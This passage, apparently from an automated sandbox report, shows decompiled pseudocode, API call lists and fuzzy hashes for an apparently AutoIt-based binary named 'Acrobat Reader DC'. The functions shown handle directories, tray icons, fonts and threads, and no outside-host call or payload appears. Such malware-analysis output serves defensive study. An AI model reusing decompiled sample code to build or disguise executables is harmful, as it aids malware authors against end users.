                                  						} while ( *((intOrPtr*)(_v8 +  *((intOrPtr*)( *_t212 + 4)) - 0x498)) != 0);
                                  						goto L8;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                  • DestroyWindow.USER32(?), ref: 00426F50
                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 4174999648-3243417748
                                  • Opcode ID: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                  • Opcode Fuzzy Hash: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004335CD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				short _v528;
                                  				signed int _t19;
                                  				signed char _t20;
                                  				long _t23;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				signed int _t29;
                                  				short* _t34;
                                  				void* _t35;
                                  				signed int _t36;
                                  				void* _t44;
                                  				void* _t48;
                                  				void* _t49;
                                  				void* _t52;
                                  
                                  				_t48 = __esi;
                                  				_t44 = __edi;
                                  				_t35 = __ebx;
                                  				E00433244( &_v528, _a4, 0x104);
                                  				_t19 = E004111C1( &_v528);
                                  				if(_t19 != 0) {
                                  					_t34 = _t52 + _t19 * 2 - 0x20e;
                                  					if( *((short*)(_t52 + _t19 * 2 - 0x20e)) == 0x5c) {
                                  						 *_t34 = 0;
                                  					}
                                  				}
                                  				_t20 = GetFileAttributesW( &_v528);
                                  				if(_t20 != 0xffffffff) {
                                  					__eflags = _t20 & 0x00000010;
                                  					if((_t20 & 0x00000010) != 0) {
                                  						goto L6;
                                  					} else {
                                  						goto L14;
                                  					}
                                  				} else {
                                  					_t23 = GetLastError();
                                  					if(_t23 != 2) {
                                  						__eflags = _t23 - 3;
                                  						if(__eflags != 0) {
                                  							L14:
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							goto L8;
                                  						}
                                  					} else {
                                  						if(CreateDirectoryW( &_v528, 0) == 0) {
                                  							L8:
                                  							_push(_t48);
                                  							_push(_t44);
                                  							_t49 = E00410160( &_v528, __eflags);
                                  							_t25 = E00413E8A(_t49, 0x5c);
                                  							__eflags = _t25;
                                  							if(__eflags != 0) {
                                  								_push(_t35);
                                  								 *_t25 = 0;
                                  								_t26 = E004335CD(_t35,  &_v528, _t49, __eflags, _t49);
                                  								_push(_t49);
                                  								_t36 = _t26;
                                  								E004111DC();
                                  								__eflags = _t36;
                                  								if(_t36 != 0) {
                                  									_t29 = CreateDirectoryW( &_v528, 0);
                                  									__eflags = _t29;
                                  									_t15 = _t29 != 0;
                                  									__eflags = _t15;
                                  									_t36 = _t36 & 0xffffff00 | _t15;
                                  								}
                                  								return _t36;
                                  							} else {
                                  								_push(_t49);
                                  								E004111DC();
                                  								__eflags = 0;
                                  								return 0;
                                  							}
                                  						} else {
                                  							L6:
                                  							return 1;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044C7DD(void* __ecx, void* __edi, char* _a4, intOrPtr _a8) {
                                  				short _t17;
                                  				signed int _t23;
                                  				char* _t35;
                                  				void* _t37;
                                  				void* _t46;
                                  				void* _t49;
                                  
                                  				_t37 = __ecx;
                                  				_t35 = _a4;
                                  				_t48 = _a8;
                                  				if(E0041341F(_a8, L"#notrayicon", 0xb) != 0) {
                                  					_t17 = E0041341F(_t48, L"#requireadmin", 0xd);
                                  					__eflags = _t17;
                                  					if(_t17 != 0) {
                                  						__eflags = E0041341F(_t48, L"#OnAutoItStartRegister", 0x16);
                                  						if(__eflags != 0) {
                                  							goto L8;
                                  						} else {
                                  							_push(__edi);
                                  							_t49 = E00410160(_t48 + 0x2c, __eflags);
                                  							E00444B5F(_t37, _t49);
                                  							E00444BBB(_t37, __eflags, _t49);
                                  							_t23 = E004111C1(_t49);
                                  							__eflags =  *((short*)(_t49 + _t23 * 2 - 2)) - 0x22;
                                  							if( *((short*)(_t49 + _t23 * 2 - 2)) != 0x22) {
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t49);
                                  								_push(_t49);
                                  								E004111DC();
                                  								return 1;
                                  							} else {
                                  								__eflags = 0;
                                  								_t7 = _t49 + 2; // 0x2
                                  								_t46 = _t7;
                                  								 *((short*)(_t49 + _t23 * 2 - 2)) = 0;
                                  								E00444B5F(0, _t46);
                                  								E00444BBB(0, __eflags, _t46);
                                  								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 8))))(_t46);
                                  								_push(_t49);
                                  								E004111DC();
                                  								return 1;
                                  							}
                                  						}
                                  					} else {
                                  						 *((char*)(_t35 + 1)) = 1;
                                  						L8:
                                  						return 1;
                                  					}
                                  				} else {
                                  					 *_t35 = 1;
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 16a74993e68b4dbac8944d2924510ff916fa528a3ea3e4646b41ce1c45576bf7
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                  • SysAllocString.OLEAUT32(?), ref: 00434F64
                                  • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                  • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                  • Opcode Fuzzy Hash: 5a110d4bb8e620b10c6e39c66250f9a1347d1bb15030520e8e6f343428dd6d14
                                  • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440F0A(intOrPtr _a4, struct HDC__* _a8, WCHAR** _a12, signed int _a16, int _a20, struct HWND__* _a24, long _a28, char _a32) {
                                  				void* _t28;
                                  				struct HDC__* _t29;
                                  				signed int _t30;
                                  				struct HWND__** _t46;
                                  				signed int _t67;
                                  				int _t69;
                                  
                                  				_t46 = _a8;
                                  				_t67 = _a24;
                                  				_a24 =  *_t46;
                                  				_t28 = _t46[0x10];
                                  				if(_t28 != 0) {
                                  					DeleteObject(_t28);
                                  				}
                                  				_t29 = GetDC(0);
                                  				_a8 = _t29;
                                  				_t30 = GetDeviceCaps(_t29, 0x5a);
                                  				ReleaseDC(0, _a8);
                                  				_t69 = CreateFontW(((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9 >> 0x1f) + ((0x49f49f49 * _t30 * _a16 >> 0x20) - _t30 * _a16 >> 9), 0, 0, 0, _a20, _t67 & 0x00000002, _t67 & 0x00000004, _t67 & 0x00000008, 1, 4, 0, _a28, 0,  *_a12);
                                  				SendMessageW(_a24, 0x30, _t69, 1);
                                  				if(_t46[0x22] == 1 && _a32 != 0) {
                                  					MoveWindow( *_t46, _t46[0x20], _t46[0x20], _t46[0x21], _t46[0x21], 0);
                                  				}
                                  				if(_t46[0x22] == 0 && _a32 != 0) {
                                  					SendMessageW(_a24, 0x142, 0, 0);
                                  				}
                                  				_t46[0x10] = _t69;
                                  				return E00430B87(_a4, _t46, 1);
                                  			}

                                  APIs
                                  • DeleteObject.GDI32(?), ref: 00440F24
                                  • GetDC.USER32(00000000), ref: 00440F2C
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                  • ReleaseDC.USER32 ref: 00440F46
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                  • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                  • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                  • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                  • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                  • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                  • SysAllocString.OLEAUT32(?), ref: 004350A9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                  • Opcode Fuzzy Hash: ec0972bcfea5d1cdd6d34f28d048cabbc30cea4348a6f33495b4b14b450a5c76
                                  • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401250(void* __eax, void* __ecx, struct HWND__* __esi, intOrPtr _a4) {
                                  				struct _NOTIFYICONDATAW _v944;
                                  				int _t34;
                                  				int _t51;
                                  				intOrPtr _t61;
                                  				struct HWND__* _t62;
                                  				void* _t70;
                                  
                                  				_t62 = __esi;
                                  				_t34 = __eax - 1;
                                  				if(_t34 != 0) {
                                  					L6:
                                  					return _t34;
                                  				} else {
                                  					_t51 = _t34 + 1;
                                  					_v944.cbSize = 0x3a8;
                                  					E00412F40( &(_v944.hWnd), _t34, 0x3a4);
                                  					E00401B80(_a4, _t70);
                                  					if( *0x4974ea != 0) {
                                  						_t61 = _a4;
                                  						_v944.hWnd = __esi;
                                  						_v944.uID = _t51;
                                  						_v944.uFlags = 2;
                                  						if( *0x4974ec != 0) {
                                  							if( *(_t61 + 0x194) != _t51) {
                                  								 *(_t61 + 0x194) = _t51;
                                  								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1a8));
                                  								Shell_NotifyIconW(_t51,  &_v944);
                                  							} else {
                                  								 *(_t61 + 0x194) = 0;
                                  								_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  								Shell_NotifyIconW(_t51,  &_v944);
                                  							}
                                  						} else {
                                  							if( *((char*)(_t61 + 9)) != 0) {
                                  								if( *(_t61 + 0x195) == 0) {
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x1b0));
                                  									 *(_t61 + 0x195) = _t51;
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								} else {
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  									 *(_t61 + 0x195) = 0;
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								}
                                  							} else {
                                  								if( *(_t61 + 0x194) == _t51) {
                                  									 *(_t61 + 0x194) = 0;
                                  									_v944.hIcon =  *((intOrPtr*)(_t61 + 0x19c));
                                  									Shell_NotifyIconW(_t51,  &_v944);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					KillTimer(_t62, _t51);
                                  					_t34 = SetTimer(_t62, _t51, 0x2ee, 0);
                                  					goto L6;
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0040127C
                                    • Part of subcall function 00401B80: _memset.LIBCMT ref: 00401C02
                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                  • SetTimer.USER32 ref: 004012E2
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                  • String ID:
                                  • API String ID: 1792922140-0
                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00413D7F(struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t16;
                                  				DWORD* _t21;
                                  				void* _t33;
                                  				char _t34;
                                  				void* _t36;
                                  
                                  				_t34 = _a12;
                                  				_t26 = 0;
                                  				_t38 = _t34;
                                  				if(_t34 != 0) {
                                  					E004178AE();
                                  					_t36 = E00416B49(1, 0x214);
                                  					__eflags = _t36;
                                  					if(__eflags == 0) {
                                  						L7:
                                  						E00413748(_t36);
                                  						__eflags = _t26;
                                  						if(_t26 != 0) {
                                  							E00417F9D(_t26);
                                  						}
                                  						_t16 = 0;
                                  						__eflags = 0;
                                  						L10:
                                  						return _t16;
                                  					}
                                  					_push( *((intOrPtr*)(E00417A69(0, __eflags) + 0x6c)));
                                  					_push(_t36);
                                  					E0041793C(0, _t33, _t34, _t36, __eflags);
                                  					 *(_t36 + 4) =  *(_t36 + 4) | 0xffffffff;
                                  					 *((intOrPtr*)(_t36 + 0x58)) = _a16;
                                  					_t21 = _a24;
                                  					 *((intOrPtr*)(_t36 + 0x54)) = _t34;
                                  					__eflags = _t21;
                                  					if(_t21 == 0) {
                                  						_t21 =  &_a12;
                                  					}
                                  					_t16 = CreateThread(_a4, _a8, E00413D1A, _t36, _a20, _t21);
                                  					__eflags = _t16;
                                  					if(_t16 != 0) {
                                  						goto L10;
                                  					} else {
                                  						_t26 = GetLastError();
                                  						goto L7;
                                  					}
                                  				}
                                  				 *((intOrPtr*)(E00417F77(_t38))) = 0x16;
                                  				E00417F25();
                                  				return 0;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                                  • String ID:
                                  • API String ID: 73303432-0
                                  • Opcode ID: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                  • Opcode Fuzzy Hash: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0047974B(void* __fp0, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr* _a16, char _a19, signed int _a20, intOrPtr _a24) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				char* _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v60;
                                  				char _v92;
                                  				signed int _v224;
                                  				signed char _v232;
                                  				signed int _v236;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t152;
                                  				signed int _t159;
                                  				signed int _t166;
                                  				signed int _t168;
                                  				signed int _t172;
                                  				intOrPtr _t174;
                                  				signed int _t186;
                                  				signed int _t188;
                                  				signed int _t195;
                                  				signed char _t196;
                                  				signed int _t203;
                                  				signed int _t204;
                                  				signed char _t205;
                                  				short* _t206;
                                  				short* _t207;
                                  				intOrPtr* _t217;
                                  				signed int _t221;
                                  				intOrPtr* _t240;
                                  				intOrPtr _t257;
                                  				signed int _t259;
                                  				signed int _t263;
                                  				signed int _t264;
